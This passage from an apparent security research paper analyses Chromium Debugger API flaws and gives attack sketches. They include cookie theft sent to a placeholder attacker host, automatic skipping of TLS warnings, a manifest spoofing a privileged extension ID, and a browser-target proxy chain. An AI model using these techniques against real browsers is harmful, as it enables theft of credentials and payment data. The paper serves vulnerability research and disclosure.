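Continuing the previous sketch, the attach-then-forward pattern might look like this; pageTargetId and sessionId are assumed to have been extracted from earlier responses, and flatten: true requests the sessionId-based mode:

// Attach to a page target previously discovered with Target.getTargets.
ws.send(JSON.stringify({
  id: 2,
  method: 'Target.attachToTarget',
  params: { targetId: pageTargetId, flatten: true }, // response carries a sessionId
}));

// Later commands include that sessionId so they run only on the chosen target.
ws.send(JSON.stringify({
  id: 3,
  sessionId, // taken from the Target.attachToTarget response
  method: 'Runtime.evaluate',
  params: { expression: 'document.title' },
}));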
The number of capabilities the protocol offers varies from version to version. In a nutshell, the CDP can perform virtually any action a user will be able to achieve with manual interaction (e.g., clicking on a link or button). Additionally, it gives finer control over browser internals [7]. While most of these capabilities are truly sensitive, this is expected from a development and debugging tool, and is not necessarily concerning by itself. However, carelessly exposing these capabilities to other parts of the browser (e.g., websites, extensions) might be a source of vulnerabilities.
The Debugger extension API
Extensions cannot control the command line arguments the browser has been launched with, which is a necessary step to activate the CDP WebSocket endpoint ( §2.2). Yet, extensions can still communicate with a version of the CDP with limited capabilities through the use of the Debugger API [37], which is a substitute for virtually any other extension API: by just requesting the debugger permission, extensions can perform a wide range of sensitive actions ( §2.2) without having to declare any further permissions in the manifest. In addition, it gives extensions access to exclusive functionality (i.e., that no other extension API offers). Table 1 provides a list of noteworthy Debugger API features alongside their counterparts using other extension APIs, if any.
The Debugger API differs from the regular CDP in that it makes critical protocol domains inaccessible: for example, the entire Target domain, as well as some cherry-picked methods from other, partially allowed domains. The rationale behind this decision is presumably to prevent a rogue extension from taking full control of the browser. We note that having a fully instrumented environment is ideal when running E2E tests, but it is a dangerous feature for an end-user to have enabled, hence the need for a limited CDP agent for extensions. Given these limitations (mainly the absence of the Target domain), an alternate API to list targets and attach to them is needed. Therefore, the Debugger API provides JavaScript bindings to perform these operations. In short, an extension has to follow three steps to instrument a target: 1) List all active targets with chrome.debugger.getTargets() to get the target, tab or extension ID of the one that will be instrumented. 2) Call chrome.debugger.attach() to attach to the desired target. Immediately after attaching, the browser will start showing a notification to inform the user of this event. 3) Use chrome.debugger.sendCommand() to send CDP commands to the debugged target and, optionally, add a listener to chrome.debugger.onEvent to be notified of CDP events.
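A minimal sketch of these three steps, runnable from the background script of an extension that declares the debugger permission (the target filter and the evaluated expression are illustrative choices of ours):

chrome.debugger.getTargets((targets) => {
  // Step 1: pick a target; here, the first ordinary HTTPS page.
  const target = targets.find((t) => t.type === 'page' && t.url.startsWith('https://'));
  if (!target) return;
  const debuggee = { targetId: target.id };

  // Step 2: attach, specifying the CDP protocol version.
  chrome.debugger.attach(debuggee, '1.3', () => {
    // Step 3 (optional): listen for CDP events from the target.
    chrome.debugger.onEvent.addListener((source, method, params) => {
      console.log(method, params);
    });
    // Step 3: send a CDP command to the attached target.
    chrome.debugger.sendCommand(debuggee, 'Runtime.evaluate',
      { expression: 'document.title' },
      (result) => console.log(result));
  });
});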
The Debugger API imposes limitations on what targets an extension can attach to. While an extension can debug itself, it cannot instrument service workers, background pages or tabs from other extensions, nor can it attach to targets with a URL scheme other than "http://" or "https://". We explore ways of bypassing these security mechanisms in §4.
User awareness. When a debugging extension successfully attaches to a target, Chromium notifies users by rendering an infobar across all open browser tabs [74], as shown in Figure 2. (We note that debugger infobars can be completely disabled if Chromium is launched with the command line flag --silent-debugger-extension-api.) This notification will not go away until there are no attached debuggers left. Optionally, a user can click on the cancel button to force all debuggers from an extension to be detached from their respective targets. However, nothing prevents a malicious extension from reattaching to the previous targets immediately after the user cancels the infobar, and this can happen without any user awareness ( §4.2).
Threat model
Our first threat model, named Threat Model A (TMA), assumes an attacker who can successfully trick a user into installing a malicious extension that declares the debugger permission, thus getting access to the capabilities described in §2.2. This extension may be distributed through official platforms such as the Chrome Web Store in the form of a signed CRX package [61]. Attacks §4.1 and §4.2 assume this threat model.
A second, more restrictive threat model, named Threat Model B (TMB), requires users to install extensions through sideloading. Sideloading consists of loading an unpacked extension [31], or drag-and-dropping a CRX package or ZIP file over the extensions management page (i.e., chrome://extensions). Because unpacked extensions and ZIP archives lack the cryptographic signature that CRX files have, their contents are not integrity-protected, nor can their authenticity be verified. Therefore, they can spoof their ID and impersonate other legitimate extensions. We describe this impersonation technique in §4.4. However, as they are not CRX packages, they cannot be distributed through the official Chrome Web Store. Attacks §4.4, §4.5 and §4.6 use Threat Model B.
We note that sideloading is a feature intended for developers, so it requires users to enable "Developer Mode" in their browsers for it to work. However, malicious actors can easily trick users into doing so, or even silently run a malicious PowerShell script that automates this process, a technique that has already been observed in the wild [18], [65]. A threat actor that gains execution capabilities outside the browser on a victim's device might prefer sideloading an extension over dropping an executable for ease of development and feature-set completeness. Browser extensions that work across different operating systems are easy to develop, and the Debugger API lets attackers evaluate arbitrary JS code and intercept network traffic in cleartext without the hassle of setting up a proxy with a trusted self-signed certificate.
Although TMB is a more restrictive threat model, it is widely accepted as realistic by the community. For example, most numbered vulnerabilities (CVEs) involving a malicious extension assume exactly this model (e.g., [55]-[59]), and it is also found in previous academic works studying malicious browser extensions [20], [45]. Furthermore, sideloading is a common practice to install extensions in regions where the Chrome Web Store is not available and alternative marketplaces have emerged [1]- [3]. One notable example is China. There, sideloading is the only way to install an extension because the Chrome Web Store is not available despite Google Chrome having the largest browser market share [73].
Attacks
We next introduce six attacks that exploit design vulnerabilities in the Debugger API and in the logic for granting restricted capabilities to highly privileged extensions. Attacks are grouped by threat model (first TMA, then TMB) and sorted by severity in ascending order.
Methodology. We performed a systematic manual code review process to find issues in the design and implementation of the Debugger API. To assess its security, we defined a set of security requirements that a hypothetically secure extension API must comply with, based on the official CRX API Security Checklist [13]. This is a public document used by Chromium developers as a baseline for following security best practices [12].
To do so, we systematically review the JavaScript bindings exposed by the chrome.debugger object [14]. For each binding, we flag its source code and that of the browser components it depends on. Then, we thoroughly inspect the flagged source code to find violations of the following requirements:
• SR01 - User Awareness. Users must be clearly informed of the implications of an extension making use of the Debugger API (e.g., during installation) and notified when an extension is actively using it (e.g., using infobars).
• SR02 - Isolation. The Debugger API must respect browser profiles, honor users' privacy choices (e.g., incognito mode), and restrict the scope of extensions using it accordingly.
• SR03 - Access Control. The Debugger API must enforce rules to prevent extensions from accessing sensitive resources (e.g., browsing history) or targets (e.g., tabs) outside their supposed reach.
• SR04 - Spoofing Avoidance. Extensions should not be able to modify critical parts of the browser UI (e.g., the settings page), so that they cannot mislead users into performing a given action.
To identify such violations, we looked for security checks or preconditions that the Debugger API should comply with. For instance, to satisfy SR01, a call to display an infobar with a localized message is likely expected when an extension attaches to a target. Once a requirement violation is found, we manually verified its potential exploitability by implementing a prototype extension and testing its effectiveness against the latest Chromium Stable release at the time. Table 2 summarizes the attacks that we found using this methodology and their impact, and Table 3 shows violations of the above Security Requirements for each attack. The order in which we introduce the attacks goes from the least to the most impactful, starting from merely listing the opened tabs and running extensions ( §4.1), then gaining access to evaluate arbitrary code on each of those targets ( §4.2, §4.3, §4.4, §4.5), and finally being able to take control of the browser ( §4.6). Note that some of our attacks achieve similar results. We include them nonetheless as they are independent from one another (i.e., they are based on different flaws, thus mitigating one attack will not affect the other).
Prevalence. We are able to reproduce our attacks in all major Chromium-based browsers (Google Chrome, Microsoft Edge, Opera and Vivaldi), including those with a special focus on privacy (Brave browser and Ungoogled Chromium [22]). We note that we have not tested these attacks on mobile versions of Chromium (e.g., Google Chrome for Android) as there is no straightforward way of installing extensions in those builds as of this writing. We provide Proofs-of-Concept (PoCs) for all of the attacks in the artifacts associated with this paper for independent validation. These PoCs are fully commented extensions based on our threat model. They showcase various real-world scenarios that make use of our findings.
(Legend for Table 3: ✗ denotes a violation of a security requirement; ✗ ‡ denotes a violation only if infobars have been disabled.)
Listing active targets
The Debugger API is implemented in such a way that extensions have to call the chrome.debugger.attach() function to start instrumenting a particular target using the CDP (see §2.3). To indicate the target, its target ID must be passed as a parameter to this function. Yet, extensions can extract a list of running target IDs by calling chrome.debugger.getTargets().
Attack vector. The chrome.debugger.getTargets() function lists not only the targets an extension is allowed to attach to (usually tabs with a URL beginning with "http://" or "https://"), but also other targets the extension is not supposed to be capable of debugging. Any extension declaring the debugger permission in its manifest can call this function from both content scripts and background pages without requiring any user interaction. This can result in privacy abuse, as it exposes sensitive data such as the user's browsing history, thus violating SR03. Being able to access this type of sensitive information raises privacy concerns, as it could be linked to user identities (e.g., by also harvesting cookies or other Personally Identifiable Information).
Impact. Alongside the target ID, the Debugger API also grants access to the URL of the target, the page title and even the favicon URL. A malicious extension can call chrome.debugger.getTargets() to easily and accurately monitor the set of opened tabs and the list of websites visited by the user, including those from incognito windows. Note that the malicious extension does not need to be granted permission to run in incognito contexts, thus breaking SR02. Additionally, because service workers and background pages are also listed, an attacker can also obtain the list of running extensions. Access to installed extensions can be used to improve device fingerprinting techniques, as in some cases it is enough to unequivocally identify a user [47], [68], [71]. Since there is no rate limit on retrieving the list of targets, an attacker could keep polling this information every few seconds or less to detect changes in enabled extensions or page navigation events, as proposed in Listing 1. An important remark is that SR01 is also violated, as no debugger infobar (see §2.3) is shown when calling the chrome.debugger.getTargets() method, thus making this attack fully silent. We provide a PoC within the artifacts that detects running extensions using solely the Debugger API.
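Listing 1 is not reproduced in this extract; a minimal sketch of such a polling loop (the 5-second interval is an arbitrary choice of ours) could be:

// Silently track tabs and running extensions; only the "debugger"
// permission is needed and no infobar is ever shown.
let previous = new Set();

setInterval(() => {
  chrome.debugger.getTargets((targets) => {
    const current = new Set(targets.map((t) => `${t.type} ${t.url}`));
    for (const entry of current) {
      if (!previous.has(entry)) console.log('new target:', entry);
    }
    previous = current;
  });
}, 5000);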
Running on regular tabs
Regular tabs are the least privileged targets a CDP client can attach to. They use either the "http://" or "https://" scheme. We note that the "ftp://" scheme is unsupported since October 2021 [30], and "file://" is restricted by default and requires the user to manually opt in [26].
Attack vector. Instrumenting a regular tab is trivial. The extension only needs to declare the debugger permission in its manifest and then attach to the desired tab using its tab ID or target ID. Both IDs can be obtained with the methods described in §4.1. Once attached, CDP messages can be exchanged (see §2.3) as long as the extension does not get detached from the target, which can happen programmatically by purposely calling chrome.debugger.detach(), or when the tab is closed or navigates to a restricted page (i.e., outside the scope of regular tabs). Because there is no finer control over this API, an extension with the debugger permission has unrestricted access to the Debugger API in its entirety. This breaks SR03, as it can be abused to access sensitive resources that would otherwise require additional permissions (e.g., the browser cookie store).
After attaching to a target, an infobar is shown to the user giving the option to force-detach the debugging extension ( §2.3). However, during our research we found that extensions can reattach immediately afterwards and that no rate-limit protection exists against this behavior. In practice, to the user this would look like the cancel button of the infobar does nothing, rendering it ineffective due to the immediacy with which extensions can re-attach. In addition, due to an incomplete security check, an extension can also attach to regular tabs from incognito windows, even when it has not been granted permission to do so (the default). While trying to attach to an incognito tab by providing the tab ID will result in a "No tab with given id" error, no additional input verification is performed when using its target ID, thus letting the extension debug tabs from incognito windows and violating SR02.
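A short sketch of the reattach behavior described above; the onDetach listener and the "canceled_by_user" reason are part of the public API, while the rest is illustrative:

// Defeat the infobar's cancel button: whenever the user force-detaches
// this extension, attach again immediately (no rate limit prevents it).
chrome.debugger.onDetach.addListener((source, reason) => {
  if (reason === 'canceled_by_user') {
    chrome.debugger.attach(source, '1.3', () => void chrome.runtime.lastError);
  }
});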
Impact. As mentioned in §2.3, the Debugger API is a general substitute for virtually any other extension API. In a nutshell, with this API, a malicious extension can:
• Steal sensitive user information. By being able to manipulate the DOM or evaluate arbitrary JavaScript expressions, the extension can read email addresses, passwords, credit card numbers and other Personally Identifiable Information (PII) already accessible to the regular tab. It is also possible to monitor all network traffic sent by the regular tab to which the extension is attached for the same purpose. Additionally, the Network.getAllCookies command lets extensions exfiltrate any cookie stored in the browser regardless of the URL of the debugged regular tab, thus providing a historical perspective of users' browsing habits and even leaking sensitive data encoded in the cookies, as Listing 2 shows (a sketch appears at the end of this subsection).
• Manipulate runtime behavior. Apart from stealing data, evaluating arbitrary code on regular tabs is also useful for modifying the UI of a web application or changing its intended behavior. For instance, an attacker may inject a JavaScript file into a banking app to alter the recipient of a wire transfer while hiding this information from the user.
• Modify site permissions. The Browser.grantPermissions command can grant any site access to privacy-sensitive resources (e.g., the microphone) without further user consent, bypassing the need for additional permissions in an extension's manifest.
We verify the previous capabilities by creating several extensions that use the Debugger API to achieve different goals. As a PoC, we provide an extension that attaches to tabs from incognito windows, and another one that lists the metadata for all cookies stored in the browser.
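Listing 2 is likewise not reproduced here; the cookie-dumping step might look roughly like the following sketch, where the tab ID and the exfiltration endpoint are hypothetical:

const debuggee = { tabId: someTabId }; // any attachable regular tab (hypothetical ID)

chrome.debugger.attach(debuggee, '1.3', () => {
  // Dumps every cookie in the browser, regardless of the debugged tab's URL.
  chrome.debugger.sendCommand(debuggee, 'Network.getAllCookies', {}, (res) => {
    fetch('https://attacker.example/exfil', { // hypothetical endpoint
      method: 'POST',
      body: JSON.stringify(res.cookies), // name, value, domain, path, ...
    });
  });
});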
Running on security interstitial tabs
Chromium comes with a built-in security feature known as Safe Browsing for blocking known phishing and malware sites [63]. When users enable this feature, the browser will block navigation to URLs included in a blocklist and instead display an interstitial dialog asking the user to confirm a dangerous action (e.g., continue anyway and visit the site) or abort and go back to the previous page. Interstitials are also used for showing SSL/TLS warnings like an expired or invalid certificate as shown in Figure 3, or when connecting to a public network behind a Captive Portal, among other use cases.
Attack vector. Given the sensitive nature of interstitials, these "loud" dialogs are always served by Chromium at chrome-error://chromewebdata/, which is a special unreachable URL (i.e., it cannot be visited by typing it on the browser's address bar).
Serving interstitials like so presents a security advantage: because the target is no longer a regular tab (i.e., it has a different scheme), extensions theoretically cannot run on it, thus preventing a malicious actor from, for instance, using the scripting extension API to evaluate arbitrary JavaScript code on the page. However, this restriction does not apply to the Debugger API, which can attach to targets with the aforementioned unreachable URL. This lack of access control to such a sensitive class of resources enables several attacks that can impersonate or modify a security interstitial.
(Figure 4: An impersonated security interstitial used to trick the user into downloading a malicious executable under the pretext that a browser update is needed.)
Impact. Given that extensions can use the Debugger API to attach to a security interstitial tab, an attacker can use this capability to:
• Impersonate interstitials. Extensions can evaluate arbitrary code to modify the appearance of these notifications to show a different message or content, therefore modifying the browser UI and violating SR04. Performing this attack is as trivial as querying the DOM nodes to modify (e.g., using document.querySelector) and then changing their HTML or text contents. A clear malicious use case is a phishing attack, given that it can produce an interstitial with the same look and feel as the ones triggered by Chromium to trick the user into performing some dangerous action, like downloading an executable, as Figure 4 shows.
• Skip interstitials. An attacker can also force the browser to automatically skip interstitials on some websites by making the extension programmatically click on the "Proceed" button or by calling certificateErrorPageController.proceed(). This could be used by a malicious extension to skip TLS warnings or error messages (e.g., related to certificate validation), which can facilitate TLS man-in-the-middle (MITM) attacks using forged certificates. The same strategy can be applied to sideload malware by skipping Safe Browsing.
To demonstrate this attack, we created a PoC extension that automatically bypasses security interstitials whenever it encounters one.
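A hedged sketch of this bypass (the helper function below is ours; certificateErrorPageController.proceed() is the call named above):

// Auto-skip TLS interstitials by evaluating code inside the special
// chrome-error://chromewebdata/ target.
function skipInterstitial(targetId) {
  const debuggee = { targetId };
  chrome.debugger.attach(debuggee, '1.3', () => {
    chrome.debugger.sendCommand(debuggee, 'Runtime.evaluate', {
      expression: 'certificateErrorPageController.proceed()',
    }, () => chrome.debugger.detach(debuggee, () => void chrome.runtime.lastError));
  });
}

chrome.debugger.getTargets((targets) => {
  targets
    .filter((t) => t.url.startsWith('chrome-error://chromewebdata/'))
    .forEach((t) => skipInterstitial(t.id));
});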
Running on WebUI tabs
A vast portion of the User Interface (UI) in Chromium is implemented using web pages. A well-known example is the browser settings page, which can be accessed by navigating to the chrome://settings URL. There are well over 70 different URLs using the internal "chrome://" scheme, ranging from the bookmarks menu to the browsing history. Google calls these Chrome UI or WebUI pages [77]. An almost complete list of WebUI URLs can be found at chrome://about. These pages run in a higher-privileged context with more capabilities than regular tabs, which are provided through (i) internal extension APIs that are granted based on the URL; and (ii) message-passing communication using Mojo JavaScript bindings [76]. For example, the chrome://extensions page, responsible for letting the user manage the installed browser extensions, has access to an internal extension API (i.e., developerPrivate) for that very purpose.
For obvious reasons, extensions cannot run on WebUI pages, as that would have devastating consequences for the browser's security model. However, in March 2013 the experimental flag extensions-on-chrome-urls was added to Chromium to circumvent this limitation and allow extensions that explicitly declared the chrome://* permission to access WebUI pages [9]. Later, in 2018, a security report flagging this issue triggered a response from the Chromium Security Team [43] that limited the capabilities of the flag by blocking extensions using the Debugger API from attaching to WebUI targets regardless of the value of the flag, as Listing 3 shows.
Attack vector. Not being able to use the Debugger API does not imply that extensions cannot run on WebUI tabs. An extension can still use the tabs or scripting APIs to evaluate JavaScript expressions when the aforementioned flag is enabled. In fact, the official "Screen Reader" extension [34] has access to the "chrome://" scheme without needing the flag to be enabled at all. This extension is an accessibility tool targeted at users with visual impairments that can read aloud the contents, buttons, menus and other elements of a page. We find other instances of security concessions made in favor of usability in platforms such as Android, where they have proven to be abusable by attackers [21], [44]. Because a significant part of the browser UI is implemented using web pages, the extension has to be able to interact with WebUI tabs to read their contents. To accomplish this, the Chromium developers made an exception for this particular extension and granted it privileges to run on these higher-privileged targets without requiring any further flags.
This backdoor access is implemented by defining an allowlist solely containing the Screen Reader extension ID, which is queried every time an extension wants to run on a given URL to determine if it is restricted or not (see Listing 4).
Using a hardcoded allowlist for this purpose is neither a robust nor a secure design choice, as the ID of an extension can be impersonated. A clone extension with the same ID as the Screen Reader extension can take advantage of its privileged position within the browser and acquire its additional capabilities. Unfortunately, this is rather trivial to perform. Figure 5 shows how Chromium calculates extension IDs by taking a DER-encoded RSA public key and producing a SHA-256 digest of its bytes, with the added distinction that the output hash in hexadecimal form uses an "a" to "p" alphabet instead of the standard "0-9" and "a-f". This digest is then cropped to return only the first 32 characters [79]. To get this public key for the ID generation, the browser looks at the header of the signed CRX package the extension came in and additionally performs an integrity check against its signature [61]. However, if the extension is sideloaded from a local directory (unpacked extension) or a ZIP archive instead of a CRX package (e.g., downloaded from the Chrome Web Store), this public key information is not available. In those cases, the ID is derived from the absolute path the extension was loaded from, unless there is a key property in the extension's manifest.json file (see Listing 5). If the property exists, whatever value it holds will be used as the extension's Base64-encoded public key [28], thus making it possible to produce clone extensions.
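The derivation just described fits in a few lines; a sketch in Node.js (the function name is ours, and the input is whatever Base64 key appears in a manifest):

const crypto = require('crypto');

// Chromium extension ID from a Base64-encoded DER public key: SHA-256 the
// key bytes, take the first 32 hex characters, and remap "0".."f" to "a".."p".
function extensionIdFromKey(base64Key) {
  const der = Buffer.from(base64Key, 'base64');
  const hex = crypto.createHash('sha256').update(der).digest('hex');
  return hex.slice(0, 32).replace(/./g, (c) => 'abcdefghijklmnop'[parseInt(c, 16)]);
}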
Clone extensions have some limitations. Without the private key of the impersonated extension, we cannot produce a valid signed CRX package and upload it to the Chrome Web Store. Therefore, the easiest alternate distribution method is to create a ZIP archive of the clone extension and convince the user to enable Developer Mode and then drag-and-drop the ZIP file over the chrome://extensions page to install it. This is one way of sideloading extensions into Chromium and, as discussed in §3, it is a usual threat model for malicious extensions.
Listing 5. Sample manifest impersonating the Screen Reader extension:
{
  "manifest_version": 3,
  "name": "Clone extension",
  "version": "0.0.1",
  "key": "MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDEGBi/oD7Yl/Y16w3+gee/95/EUpRZ2U6c+8orV5ei+3CRsBsoXI/DPGBauZ3rWQ47aQnfoG00sXigFdJA2NhNK9OgmRA2evnsRRbjYm2BG1twpaLsgQPPus3PyczbDCvhFu8k24wzFyEtxLrfxAGBseBPb9QrCz7B4k2QgxD/CwIDAQAB"
}
Impact. Allowing extensions to run arbitrary code on WebUI pages violates both SR03 and SR04, because these pages have access to sensitive resources (e.g., browsing history) and control parts of the browser UI. Some applications of this attack include:
• Modify browser settings. A clone extension can evaluate JavaScript on the chrome://settings page to read or tamper with the browser settings. This can be done without user interaction.
• Steal passwords and credit cards. Chromium comes with a built-in password and payment methods manager. Because plaintext passwords and credit card details are accessible through the settings page, an attacker can obtain this information in plain text. (In some operating systems, like Windows, Chromium stores passwords encrypted with the logged-in user's credentials; for this reason, leaking passwords might require users to authenticate themselves first.)
• Read the GAIA ID. Every Google account is identified by a unique Google Accounts and ID Administration ID, or GAIA ID for short [41]. This identifier is stored by the browser when a Google account has logged in and can be leaked from the chrome://signin-internals/ page.
• Modify browser flags. Some browser settings (like the flag mentioned in this section) are not intended to be changed by regular users for security reasons. However, since these are listed on chrome://flags, they can be arbitrarily changed by a malicious extension.
• List omnibox predictors. To provide relevant autocomplete suggestions, Chromium keeps track locally of all text typed into the search bar (i.e., the omnibox [75]). The page chrome://predictors/ exposes this data as a WebUI tab, making it accessible to an attacker.
Our PoC demonstrates how this attack allows obtaining the details of payment methods found in chrome://settings/payments, one of the browser's settings pages.
Running on other extensions
Similar to WebUI pages, which are served from the privileged "chrome://" scheme, extensions also run in a restricted environment, each having their own dedicated base URL in the form of chrome-extension://<extension-id>. In practice, this implies that an extension can access any assets and run on targets belonging to its base URL (like its background page or service worker), but it is not allowed to do the same with other extensions. Despite running in isolation from each other, extensions can communicate with other extensions, tabs and background scripts through message passing [32]. While message communication can be used to evaluate code on a vulnerable target [23], extensions can never directly run on a third-party extension using browser extension APIs like they can with regular tabs.
Attack vector. The same experimental flag used in §4.4 to run on WebUI tabs grants access to the "chrome-extension://" scheme (Listing 4). However, there is no way to declare a host permission with this scheme in the manifest file of an extension, as that will throw a validation warning and the browser will ignore the permission altogether. A crucial aspect here is that, while most browser extension APIs, like tabs and scripting, verify host permissions before running on a target, the Debugger API implicitly grants access to any URL without requiring host permissions. For this reason, it only checks whether a URL is restricted by calling the PermissionsData::IsRestrictedUrl() method.
Because this method effectively considers a URL unrestricted when the extensions-on-chrome-urls flag is enabled, the Debugger API can be used to attach to any target from any extension. This can be used as an alternative exploitation method that requires neither sideloading nor impersonating the Screen Reader extension using the technique described in §4.4.
Impact. A malicious extension exploiting this technique can attach to an existing legitimate extension to:
• Steal sensitive information. By attaching to another extension, an attacker can evaluate JavaScript code to steal passwords, PGP private keys or other sensitive information, hence breaking SR03. A clear target for this are password manager extensions.
• Manipulate the extension's behavior. Similar to §4.2, debugging an extension can be used to change its appearance and behavior. This allows, for example, stealing funds by modifying the receiving address of a cryptocurrency transaction initiated with MetaMask [19].
This attack presents an interesting property that eases its distribution and amplifies its impact. In the past, there have been instances of legitimate extensions going rogue. One common cause is developers selling their published items to other companies that then push a malicious update to steal private user information. These extensions operate for a limited time on a trusted marketplace (e.g., the Chrome Web Store) before they get spotted and delisted [64], [70]. Another popular approach to distribute malware is to publish a fake extension impersonating or cloning a legitimate one to trick users into trusting it [10]. This is accomplished either by having a very similar UI or by building a modified version of the original extension with patches that add the malicious functionality. The former approach has been seen in a recent operation attributed to North Korea that made the news in January 2022 [18]. The attack described in this section requires neither repackaging fake extensions nor buying existing ones. Instead, an attacker just needs to distribute a malicious extension that attaches to as many legitimate targets (i.e., extensions) as needed to monitor and manipulate their behavior.
To demonstrate the stealing capabilities, we created a PoC extension that attaches to the LastPass [48] and Mailvelope [52] extensions to steal passwords and PGP private keys, respectively.
Attaching to the browser target
We mentioned in §2.2 that extensions using the Debugger API are neither supposed nor allowed to attach to the browser target, presumably to prevent a rogue extension from taking control of an end-user's browser. Since they cannot use the Target domain, extensions attach to targets using the chrome.debugger.attach() JavaScript binding provided by the Debugger API, which allows an extension to send CDP commands to, and only to, a given target. That is, if an extension wants to instrument two different tabs, it needs to attach to both of them separately. If it were to exist, a hypothetical extension with access to the browser target would be capable of instrumenting any tab or extension running in the browser, as the Target CDP domain does not enforce further access control rules.
Attack vector. For reasons similar to those discussed for the Screen Reader extension (see §4.4), there is another special extension that is granted a privileged status with more capabilities, including the ability to attach to the browser target using the Debugger API: the Perfetto UI extension [40]. This is an official development tool from Google that interacts with a web app [33] to profile, record, and view Chromium execution traces. To obtain these traces, the Perfetto UI extension uses commands from the Tracing CDP domain, which are not accessible outside the browser target. Unlike the attacks running on WebUI tabs and on other extensions, there is no flag to replicate this backdoor access. As such, it can only be exploited by sideloading a clone extension that impersonates the Perfetto UI extension following the steps we introduced in §4.4. This access is hardcoded in the Chromium source code and allows the Perfetto UI extension to attach to the browser target by specifying the undocumented "browser" target ID, as shown in Listing 6 and Listing 7.
The browser target that the Perfetto UI extension can attach to is not as powerful as the actual browser target, because some domains and commands are inaccessible (e.g., the Network domain is missing from this CDP host). Nevertheless, this tool still has access to more domains than it seems to need to deliver its functionality, which goes against the principle of least privilege. One of these domains is the Target domain, which from here is not capable of communicating with other targets because the Target.sendMessageToTarget command does not deliver CDP messages to their destination. Another functionality that does not work is flattened access [50] (an improved mode of operation intended to deprecate the former command), as the sessionId property that needs to be added to CDP messages for this mode to work cannot be sent using the Debugger API. However, these limitations can be bypassed to send commands to any arbitrary target as follows: 1) Attach to the browser target using the Debugger API. 2) Create a proxy target (a tab with an about:blank URL will do) and attach to it using the Debugger API as in the previous step. 3) Send the Target.exposeDevToolsProtocol command to the browser target to expose a pair of JavaScript bindings in the proxy target; these will be used to communicate with the desired arbitrary target through a different communication channel that allows sending CDP messages with the sessionId property. 4) Use the window.cdp object from the proxy target to attach to the desired final target (e.g., a WebUI tab or an extension background page) and start sending commands to it through the proxy.
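A rough, heavily simplified sketch of these four steps; it assumes the extension already impersonates the Perfetto UI extension ID as in §4.4, omits error handling, and leaves the final target ID as a placeholder:

const browser = { targetId: 'browser' }; // the undocumented special target ID

// Step 1: attach to the (limited) browser target.
chrome.debugger.attach(browser, '1.3', () => {
  // Step 2: create a proxy tab and attach to it as well.
  chrome.tabs.create({ url: 'about:blank' }, (tab) => {
    chrome.debugger.getTargets((targets) => {
      const proxyInfo = targets.find((t) => t.tabId === tab.id);
      const proxy = { targetId: proxyInfo.id };
      chrome.debugger.attach(proxy, '1.3', () => {
        // Step 3: expose window.cdp inside the proxy tab.
        chrome.debugger.sendCommand(browser, 'Target.exposeDevToolsProtocol',
          { targetId: proxyInfo.id, bindingName: 'cdp' }, () => {
          // Step 4: from inside the proxy page, use window.cdp to attach to
          // the desired final target with sessionId-tagged messages.
          chrome.debugger.sendCommand(proxy, 'Runtime.evaluate', {
            expression: `window.cdp.send(JSON.stringify({
              id: 1,
              method: 'Target.attachToTarget',
              params: { targetId: '<final-target-id>', flatten: true }
            }))`,
          });
        });
      });
    });
  });
});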
Impact. By impersonating the Perfetto UI extension, an attacker can abuse the CDP browser target to gain all capabilities from the previous attacks combined. In practice, this means an extension can hijack any regular tab, WebUI page or extension belonging to any browser context, including incognito windows. We include two different artifacts to exemplify this attack and its impact. The first one is another credit card stealer similar to the one we made for §4.4. However, this sample uses the Debugger API and the browser target to attach to chrome://settings/payments. The second sample is a browser-wide traffic monitor that logs all requests and responses from any opened tab or running extension, including incognito windows and WebUI tabs (see Listing 8 for a simplified code snippet).
Discussion
In this section, we discuss the impact of our attacks, our concerns with the current Chromium extensions architecture, and the effectiveness of the solutions already implemented or proposed by the Chromium Development Team.
Impact
The attacks presented in this paper allow a malicious extension to abuse flaws in the Debugger API to steal sensitive user information and manipulate runtime behavior (Table 2), all while violating basic security requirements such as isolation or access control (Table 3). In addition, since most of the Chromium UI is implemented using WebUI pages ( §4.4), an attacker is also able to change browser settings or even experimental flags. We have also shown how the Debugger API can be misused to modify site permissions ( §4.2) or bypass security interstitials without any user awareness or intervention ( §4.3).
Our attacks can have a high impact due to the privileged capabilities an attacker can acquire, but also because they are rooted in core components of the Chromium Project, which is critical in today's web browser market. According to StatCounter [72], Google Chrome has a 60% market share, and Chromium is present in popular forks such as Microsoft Edge, Brave browser, and Opera, among others. Furthermore, three of our attacks ( §4.4, §4.5, §4.6) are in part the result of a questionable approach to integrating two officially-branded Google extensions with Chromium. This approach consists of hardcoding the IDs of such extensions into the browser's source code, thus widening the impact of the attacks by propagating these changes to Chromium forks as well. Other Chromium-based products may inherit this artifact and its associated risks, even if said extensions are not intended to run in them. This might be an even larger problem for products with a more permissive extension origin policy, since they might not be aware of this threat vector.
Root causes
The attacks proposed in our work are possible due to a combination of factors that have shaped core components of the Chromium project and its development. We now discuss these enablers.
Design flaws. The attacks described in this paper do not exploit flaws in the implementation of a specification (e.g., memory corruption issues). Instead, they originate from design decisions where the risk-benefit trade-off may not be well balanced. One clear example is the attack described in §4.3. Attaching to security interstitials using the Debugger API was not possible until Chromium 70, when this capability was intentionally granted [42] to prevent the Lighthouse extension (an official Google development tool) from detaching when running tests on a web application without offline support [62]. While the implementation of this change did not introduce any bugs per se, the design decision behind it is, at a minimum, questionable, because security interstitials are triggered after a critical event that requires user consent.
The backdoor accesses used in §4.4, §4.5 and §4.6 suggest design choices that were not sufficiently evaluated from a security standpoint. These privileges were implemented in such a way that they blindly trust the ID of an extension without verifying its signature. In the case of the Screen Reader extension, even the Chromium developer who introduced the change in October 2011 explicitly acknowledged that this solution is "temporary" and that a long-term alternative is needed [53]. However, as of the writing of this paper, this temporary code written 11 years ago has not yet been superseded, nor is there any indication that it will be.
As for the Perfetto UI extension, the change was introduced in January 2020 [46] to let https://ui.perfetto.dev get traces from all tabs or renderers through this extension. Unfortunately, more CDP domains apart from Tracing were exposed when allowing attaching to a limited instance of the browser target. It is evident that this decision was not deeply thought-out and that extensions are not expected to attach to the browser target given the convoluted workaround we had to come up with for §4.6.
